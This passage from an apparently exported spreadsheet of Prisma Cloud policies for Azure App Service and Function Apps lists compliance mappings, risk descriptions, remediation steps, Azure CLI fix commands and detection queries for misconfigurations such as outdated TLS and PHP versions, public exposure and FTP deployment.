New Zealand Information Security Manual (NZISM v3.4), CIS v1.1 (Azure), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CIS Controls v8, CIS v2.1.0 (Azure) Level 1, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], FFIEC, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), TX-RAMP Level 1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight, NIST CSF v2.0, HITRUST v.9.4.2 [Deprecated], CIS Controls v7.1, NIST 800-53 Rev4, Azure Security Benchmark (v3), CIS v1.3.1 (Azure), NIST CSF v2.0, CCPA 2018, PIPEDA, CIS Controls v8.1, PCI DSS v4.0, NIST 800-53 Rev 5, Brazilian Data Protection Law (LGPD), testazure, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, RBI Baseline Cyber Security and Resilience Requirements, Sarbanes Oxley Act (SOX), CyberSecurity Law of the People's Republic of China, MLPS 2.0 (Level 2), NIST SP 800-172, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2024.2, CIS v2.0.0 (Azure) Level 1, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements</t>
        </is>
      </c>
      <c r="B2201" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2201" s="2" t="inlineStr"/>
      <c r="D2201" t="inlineStr"/>
      <c r="E2201" t="inlineStr"/>
      <c r="F2201" t="inlineStr"/>
      <c r="G2201" t="b">
        <v>1</v>
      </c>
      <c r="H22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01" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2201" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2201" t="inlineStr">
        <is>
          <t>Azure App Service Web app doesn't use latest PHP version</t>
        </is>
      </c>
      <c r="L2201" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2201" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2201" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2201" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2201" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2201" t="inlineStr">
        <is>
          <t>9</t>
        </is>
      </c>
      <c r="R2201" t="inlineStr">
        <is>
          <t>9.7</t>
        </is>
      </c>
      <c r="S2201" t="inlineStr">
        <is>
          <t>AppService,Policy Status Review</t>
        </is>
      </c>
      <c r="T2201" t="b">
        <v>0</v>
      </c>
      <c r="U2201" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2201" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2201" t="inlineStr">
        <is>
          <t>This policy identifies App Service Web apps that are not configured with latest PHP version. Periodically, newer versions are released for PHP software either due to security flaws or to include additional functionality. It is recommended to use the latest PHP version for web apps in order to take advantage of security fixes, if any.</t>
        </is>
      </c>
      <c r="X2201" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Navigate to 'App Services' dashboard
3. Select the reported web app service
4. Under 'Settings' section, Click on 'Configuration'
5. Click on 'General settings' tab, Ensure that Stack is set to PHP and Minor version is set to latest version.
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2201" t="inlineStr"/>
      <c r="Z2201" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = 'config.isPhpVersionLatest exists and config.isPhpVersionLatest equals false'</t>
        </is>
      </c>
      <c r="AA2201" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2201" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2201" t="inlineStr">
        <is>
          <t>PC-AZR-APP-413</t>
        </is>
      </c>
      <c r="AD2201" t="b">
        <v>1</v>
      </c>
      <c r="AE2201" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2201" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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01" t="inlineStr">
        <is>
          <t>15ce114a-1f16-4d0a-9ad3-1e674dcd9525</t>
        </is>
      </c>
      <c r="AI2201" t="inlineStr">
        <is>
          <t>44f36d2e-b8d6-4930-b11c-5c03b65c2082</t>
        </is>
      </c>
      <c r="AJ2201" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2201" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2202">
      <c r="A2202" t="inlineStr"/>
      <c r="B2202" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2202" s="2" t="inlineStr"/>
      <c r="D2202" t="inlineStr"/>
      <c r="E2202" t="inlineStr"/>
      <c r="F2202" t="inlineStr"/>
      <c r="G2202" t="b">
        <v>1</v>
      </c>
      <c r="H22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02" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2202" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2202" t="inlineStr">
        <is>
          <t>Privilege escalation and lateral movement risk due to a publicly exposed Azure Function with administrative permissions</t>
        </is>
      </c>
      <c r="L2202" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M2202" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2202" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2202" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2202" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2202" t="inlineStr"/>
      <c r="R2202" t="inlineStr"/>
      <c r="S2202" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2202" t="b">
        <v>0</v>
      </c>
      <c r="U2202" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2202" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2202" t="inlineStr">
        <is>
          <t>This policy identifies Azure Function Apps that are publicly exposed with administrative permissions that could potentially lead to privilege escalation and lateral movement.
Attackers can exploit a publicly exposed Azure Function with administrative permissions to gain initial access and escalate privileges. This allows lateral movement across the Azure environment, compromising resources and potentially leading to data exfiltration or service disruption. As a result, attackers can leverage any associated permissions to access other Azure resources or run malicious code in the function.
Immediate attention is required to restrict public exposure and review risky administrative permissions for the Function App as soon as possible.</t>
        </is>
      </c>
      <c r="X2202" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
1. Log in to the Azure portal
2. Navigate to the Function App
3. Click on the reported Function App
4. Under the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[PERMISSION]
1. Sign in to the Azure Management Console
2. Navigate to the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a built-in or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y2202" t="inlineStr"/>
      <c r="Z2202" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-app-service') and finding.name contains all ('(Disabled) Azure Function app configured with public network access','Azure Function App with administrative permissions')</t>
        </is>
      </c>
      <c r="AA2202" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2202" t="inlineStr">
        <is>
          <t>2024-09-27 06:57:38</t>
        </is>
      </c>
      <c r="AC2202" t="inlineStr"/>
      <c r="AD2202" t="b">
        <v>1</v>
      </c>
      <c r="AE2202" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2202" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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2" t="inlineStr">
        <is>
          <t>549c22e0-80f5-47dc-93e5-81f406417152</t>
        </is>
      </c>
      <c r="AI2202" t="inlineStr">
        <is>
          <t>0352b77d-a034-428e-94e4-e82da1b7b717</t>
        </is>
      </c>
      <c r="AJ2202" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2202" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2203">
      <c r="A2203" t="inlineStr"/>
      <c r="B2203" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2203" s="2" t="inlineStr"/>
      <c r="D2203" t="inlineStr"/>
      <c r="E2203" t="inlineStr"/>
      <c r="F2203" t="inlineStr"/>
      <c r="G2203" t="b">
        <v>1</v>
      </c>
      <c r="H22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03" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2203" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2203" t="inlineStr">
        <is>
          <t>Privilege escalation and unauthorised access risk due to a publicly exposed and unauthenticated Azure Function with administrative permissions</t>
        </is>
      </c>
      <c r="L2203" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M2203" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2203" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2203" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2203" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2203" t="inlineStr"/>
      <c r="R2203" t="inlineStr"/>
      <c r="S2203" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2203" t="b">
        <v>0</v>
      </c>
      <c r="U2203" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2203" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2203" t="inlineStr">
        <is>
          <t>This policy identifies Azure Function Apps that are publicly exposed, not configured with app authentication, and have risky permissions that could potentially lead to privilege escalation and unauthorised access.
Attackers can easily discover and invoke publicly exposed functions without any authentication, granting them immediate access with high-level privileges. This allows them to escalate privileges further, potentially hijacking the identity assigned to the function. Consequently, attackers gain unauthorized access to sensitive resources and data within the Azure environment, leading to potential data breaches, service disruptions, or complete account takeover.
Immediate attention is required to configure Azure Function app authentication, review administrative privilege escalation permissions, and restrict public exposure reported for the Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2203" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
1. Log in to the Azure portal
2. Navigate to the Function App
3. Click on the reported Function App
4. Under the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[MISCONFIGURATION]
1. Log in to the Azure portal
2. Navigate to Function App
3. Click on the reported Function App
4. Under the Settings section, Click on 'Authentication'
5. Click on 'Add identity provider'
6. Select an identity provider from the dropdown and choose other parameters as per your requirement
7. Click on 'Add'
[PERMISSION]
1. Sign in to the Azure Management Console
2. Navigate to the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a built-in or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y2203" t="inlineStr"/>
      <c r="Z2203" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-app-service') and finding.name contains all ('(Disabled) Azure Function app configured with public network access','Azure Function App authentication is off','Azure Function App with administrative permissions')</t>
        </is>
      </c>
      <c r="AA2203" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2203" t="inlineStr">
        <is>
          <t>2024-09-27 06:57:38</t>
        </is>
      </c>
      <c r="AC2203" t="inlineStr"/>
      <c r="AD2203" t="b">
        <v>1</v>
      </c>
      <c r="AE2203" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2203" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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3" t="inlineStr">
        <is>
          <t>7d8283ff-d4c2-40c4-b029-7ed558bc1f3b</t>
        </is>
      </c>
      <c r="AI2203" t="inlineStr">
        <is>
          <t>9a2024f7-f926-4503-b9bf-41f76387810b</t>
        </is>
      </c>
      <c r="AJ2203" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2203" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2204">
      <c r="A2204" t="inlineStr">
        <is>
          <t>HIPAA, PCI DSS v4.0, ISO/IEC 27001:2022, ISO/IEC 27001:2022, CRI Profile v2.0, NIST CSF v2.0, New Zealand Information Security Manual (NZISM v3.4), Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, FFIEC, NIST SP 800-171 Revision 3, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v7.1, CRI Profile v1.2.1, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, ISO 27002:2022, ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, PCI DSS v4.0, DORA, NIST CSF v2.0, PCI DSS v4.0, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), Microsoft Cloud Security Benchmark v1, CIS Controls v8.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), CRI Profile v1.2.1, kfirdaus AWS Account-CS, CRI Profile v2.0, PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8, CIS Controls v8.1, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2204" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2204" s="2" t="inlineStr"/>
      <c r="D2204" t="inlineStr"/>
      <c r="E2204" t="inlineStr"/>
      <c r="F2204" t="inlineStr"/>
      <c r="G2204" t="b">
        <v>1</v>
      </c>
      <c r="H22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04" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2204" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2204" t="inlineStr">
        <is>
          <t>Azure Function App doesn't use latest TLS version</t>
        </is>
      </c>
      <c r="L2204" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2204" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2204" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2204" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2204" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2204" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2204" t="inlineStr">
        <is>
          <t>ISM-1139</t>
        </is>
      </c>
      <c r="S2204" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T2204" t="b">
        <v>1</v>
      </c>
      <c r="U2204" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2204" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2204" t="inlineStr">
        <is>
          <t>This policy identifies Azure Function App which are not set with latest version of TLS encryption. Azure currently allows the Function App to set TLS versions 1.0, 1.1 and 1.2. It is highly recommended to use the latest TLS 1.2 version for Function App secure connections.</t>
        </is>
      </c>
      <c r="X2204" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to Function App
3. Click on the reported Function App
4. Under Setting section, Click on 'TLS/SSL settings'
5. In 'Protocol Settings', Set 'Minimum TLS Version' to '1.2' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-azure-function-app-uses-the-latest-version-of-tls-encryption
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-azure-function-app-uses-the-latest-version-of-tls-encryption</t>
        </is>
      </c>
      <c r="Y2204" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Web/sites/config/Write' permission. Successful execution sets web app TLS encryption version to latest TLS version(i.e. TLS 1.2).",
'impact': 'Sets latest TLS version in Azure Function App',
'cliScriptTemplate': 'az functionapp config set --resource-group $resourceGroup --name $resourceName --min-tls-version 1.2'</t>
        </is>
      </c>
      <c r="Z2204" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = properties.state equal ignore case "Running" AND kind contains "functionapp" AND kind does not contain "workflowapp" AND kind does not equal "app" AND config.minTlsVersion does not equal "1.2"
{"category":"Networking","resourceTypes":["azurerm_function_app"]}</t>
        </is>
      </c>
      <c r="AA2204" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2204" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2204" t="inlineStr">
        <is>
          <t>PC-AZR-APP-675-CKV_AZURE_145</t>
        </is>
      </c>
      <c r="AD2204" t="b">
        <v>1</v>
      </c>
      <c r="AE2204" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2204" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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04" t="inlineStr">
        <is>
          <t>7c24e2c1-3ef1-49bf-aaf4-f1a8e5459186</t>
        </is>
      </c>
      <c r="AI2204" t="inlineStr">
        <is>
          <t>c82a5f89-cd01-4bcf-8fa3-99396a4c848d</t>
        </is>
      </c>
      <c r="AJ2204" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2204" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2205">
      <c r="A2205" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v2), ISO/IEC 27017:2015, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS v1.2.0 (Azure), APRA (CPS 234) Information Security, CIS v2.0.0 (Azure) Level 1, CIS v1.5.0 (Azure) - Level 1, CIS v1.3.1 (Azure), Azure Security Benchmark (v3), ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, CIS v1.4.0 (Azure), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CIS v2.1.0 (Azure) Level 1, MLPS 2.0 (Level 2), PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Copy of CIS v1.2.0 (Azure), Sarbanes Oxley Act (SOX), CIS v1.3.0 (Azure), APRA (CPS 234) Information Security, Copy of Azure Security Benchmark (v3), HITRUST v.9.4.2 [Deprecated], MTSBv2_Azure, CIS Controls v8.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, NIST SP 800-171 Revision 2, CIS Controls v7.1, Azure Security Benchmark (v2), NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2205" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2205" s="2" t="inlineStr"/>
      <c r="D2205" t="inlineStr"/>
      <c r="E2205" t="inlineStr"/>
      <c r="F2205" t="inlineStr"/>
      <c r="G2205" t="b">
        <v>1</v>
      </c>
      <c r="H22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05" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2205" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2205" t="inlineStr">
        <is>
          <t>Azure App Services FTP deployment is All allowed</t>
        </is>
      </c>
      <c r="L2205" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2205" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2205" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2205" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2205" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2205" t="inlineStr">
        <is>
          <t>AppService</t>
        </is>
      </c>
      <c r="R2205" t="inlineStr">
        <is>
          <t>9.10</t>
        </is>
      </c>
      <c r="S2205" t="inlineStr"/>
      <c r="T2205" t="b">
        <v>0</v>
      </c>
      <c r="U2205" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2205" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2205" t="inlineStr">
        <is>
          <t>This policy identifies Azure App Services which has FTP deployment setting as All allowed. Attacker could listen to wifi traffic and get the login credentials to a FTP deployments which could be in plain text and get full control of the code base of the app or service. It is highly recommend to use FTPS if FTP deployment for workflow is essential else disable the FTP deployment for Azure App Services.</t>
        </is>
      </c>
      <c r="X2205" t="inlineStr">
        <is>
          <t>Following recommendation steps are for resources hosted in App Service, Premium and Windows Consumption plans,
1. Log in to the Azure Portal
2. Select 'App Services' from the left pane
3. Select the reported App Services
4. Go to 'Configurations' under 'Settings'
5. Click on 'General settings'
6. Select 'FTPS only' or 'Disabled' for 'FTP state' under 'Platform settings'
7. Click on 'Save'
If Function App Hosted in Linux using Consumption (Serverless) Plan follow below steps
Azure CLI Command 
FTP Disable - \"az functionapp config set --ftps-state Disabled --name MyFunctionApp --resource-group MyResourceGroup\"
FTPS only - \"az functionapp config set --ftps-state FtpsOnly --name MyFunctionApp --resource-group MyResourceGroup\" 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-ftp-deployments-are-disabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-ftp-deployments-are-disabled</t>
        </is>
      </c>
      <c r="Y2205" t="inlineStr"/>
      <c r="Z2205" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = config.ftpsState equals AllAllowed
{"category":"General","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA2205" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2205" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2205" t="inlineStr">
        <is>
          <t>PC-AZR-APP-576-CKV_AZURE_78</t>
        </is>
      </c>
      <c r="AD2205" t="b">
        <v>1</v>
      </c>
      <c r="AE2205" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2205" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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05" t="inlineStr">
        <is>
          <t>7fa164f0-fb0d-40a1-8293-8192f64eed81</t>
        </is>
      </c>
      <c r="AI2205" t="inlineStr">
        <is>
          <t>cd13ceb9-5139-4bf3-b722-0d6be1d36627</t>
        </is>
      </c>
      <c r="AJ2205" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2205" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2206">
      <c r="A2206" t="inlineStr">
        <is>
          <t>HIPAA, PCI DSS v4.0, ISO/IEC 27001:2022, CSA CCM v.4.0.1, ISO/IEC 27001:2022, CIS v1.1 (Azure), APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, Azure Security Benchmark (v2), NIST CSF v2.0, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST SP 800-172, CIS v1.4.0 (Azure), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, CIS v1.3.0 (Azure), PCI DSS v3.2.1, MITRE ATT&amp;CK v8.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, ISO/IEC 27002:2013, Azure Security Benchmark (v3), NIST SP 800-171 Revision 2, CIS Controls v7.1, MITRE ATT&amp;CK v12, CRI Profile v1.2.1, ISO 27002:2022, ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, CIS v1.5.0 (Azure) - Level 1, Matt's ATT&amp;ACK, ISO/IEC 27017:2015, GDPR, CIS Controls v7.1, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, DORA, NIST CSF v2.0, ISO/IEC 27002:2013, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v4.0, NIST 800-53 Rev4, Microsoft Cloud Security Benchmark v1, ISO/IEC 27018:2019, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, CIS v2.1.0 (Azure) Level 1, CIS Controls v8.1, CSA CCM v.4.0.1, CIS v2.0.0 (Azure) Level 1, APRA (CPS 234) Information Security, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, CRI Profile v1.2.1, CIS v1.2.0 (Azure), SOC 2, NIST CSF, PCI DSS v3.2.1, CRI Profile v2.0, Fedramp (Moderate), ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS v1.3.1 (Azure), PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CCPA 2018, PIPEDA, ISO/IEC 27002:2013, CIS Controls v8, CIS Controls v8.1, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, Azure Security Benchmark (v2), CSA CCM v.4.0.1, NIST SP 800-172, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2206" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2206" s="2" t="inlineStr"/>
      <c r="D2206" t="inlineStr"/>
      <c r="E2206" t="inlineStr"/>
      <c r="F2206" t="inlineStr"/>
      <c r="G2206" t="b">
        <v>1</v>
      </c>
      <c r="H22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06" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2206" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2206" t="inlineStr">
        <is>
          <t>Azure App Service Web app doesn't use latest TLS version</t>
        </is>
      </c>
      <c r="L2206" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2206" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2206" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2206" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2206" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2206" t="inlineStr">
        <is>
          <t>TA0001</t>
        </is>
      </c>
      <c r="R2206" t="inlineStr">
        <is>
          <t>T1190 - Exploit Public-Facing Application (TA0001)</t>
        </is>
      </c>
      <c r="S2206" t="inlineStr">
        <is>
          <t>AppService</t>
        </is>
      </c>
      <c r="T2206" t="b">
        <v>1</v>
      </c>
      <c r="U2206" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2206" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2206" t="inlineStr">
        <is>
          <t>This policy identifies Azure web apps that are not configured with the latest version of TLS encryption. Azure Web Apps provide a platform to host and manage web applications securely.
Using the latest TLS version is crucial for maintaining secure connections. Older versions of TLS, such as 1.0 and 1.1, have known vulnerabilities that can be exploited by attackers. Upgrading to newer versions like TLS 1.2 or 1.3 ensures that the web app is better protected against modern security threats.
It is highly recommended to use the latest TLS version (greater than 1.1) for secure web app connections.</t>
        </is>
      </c>
      <c r="X2206" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to App Services
3. Click on the reported App
4. Under "Settings" section, Click on "Configuration"
5. In "Platform Settings", Set "Minimum Inbound TLS Version" to "1.2" or "1.3"
6. Click on "Save" icon at the top
7. Click "Continue" to save the changes 
Build Recommendation: Refer the documentation for more details,
